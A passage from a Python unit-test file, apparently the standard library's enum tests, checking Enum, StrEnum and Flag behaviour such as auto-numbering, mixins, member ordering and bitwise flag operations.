self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
class Base2(Enum):
@enum.property
def flash(self):
return 'flashy dynamic'
class Test(Base2):
flash = 1
self.assertEqual(Test.flash.flash, 'flashy dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_missing_exceptions_reset(self):
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum creates a reference loop and thus
# Class2 instances will stick around until the next gargage collection
# cycle, unlike Class1.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_miltuple_mixin_with_common_data_type(self):
class CaseInsensitiveStrEnum(str, Enum):
@classmethod
def _missing_(cls, value):
for member in cls._member_map_.values():
if member._value_.lower() == value.lower():
return member
return super()._missing_(value)
#
class LenientStrEnum(str, Enum):
def __init__(self, *args):
self._valid = True
@classmethod
def _missing_(cls, value):
unknown = cls._member_type_.__new__(cls, value)
unknown._valid = False
unknown._name_ = value.upper()
unknown._value_ = value
cls._member_map_[value] = unknown
return unknown
@property
def valid(self):
return self._valid
#
class JobStatus(CaseInsensitiveStrEnum, LenientStrEnum):
ACTIVE = "active"
PENDING = "pending"
TERMINATED = "terminated"
#
JS = JobStatus
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
missing = JS('missing')
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
self.assertTrue(isinstance(missing, JS))
self.assertFalse(missing.valid)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_missing_value_error(self):
with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
class Combined(str, Enum):
#
def __new__(cls, value, sequence):
enum = str.__new__(cls, value)
if '(' in value:
fis_name, segment = value.split('(', 1)
segment = segment.strip(' )')
else:
fis_name = value
segment = None
enum.fis_name = fis_name
enum.segment = segment
enum.sequence = sequence
return enum
#
def __repr__(self):
return "<%s.%s>" % (self.__class__.__name__, self._name_)
#
key_type = 'An$(1,2)', 0
company_id = 'An$(3,2)', 1
code = 'An$(5,1)', 2
description = 'Bn$', 3
@unittest.skipUnless(
python_version == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
@unittest.skipUnless(
python_version < (3, 12),
'member-member access now raises an exception',
)
def test_warning_for_member_from_member_access(self):
with self.assertWarns(DeprecationWarning):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
self.assertIs(Di.NO, nope)
@unittest.skipUnless(
python_version >= (3, 12),
'member-member access currently issues a warning',
)
def test_exception_for_member_from_member_access(self):
with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
def test_strenum_auto(self):
class Strings(StrEnum):
ONE = auto()
TWO = auto()
self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])
def test_dynamic_members_with_static_methods(self):
#
foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
class Foo(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
})
def upper(self):
return self.value.upper()
self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
self.assertEqual(Foo.FOO_CAT.value, 'aloof')
self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
#
with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
class FooBar(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
},
**{'FOO_CAT': 'small'},
)
def upper(self):
return self.value.upper()
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(Perm(~0)), 'R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_boundary(self):
self.assertIs(enum.Flag._boundary_, STRICT)
class Iron(Flag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(Flag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(Flag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(Flag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'BLACK' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RO' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
self.assertFalse('BLACK' in Color)
self.assertFalse('RO' in Open)
self.assertTrue(1 in Color)
self.assertTrue(1 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
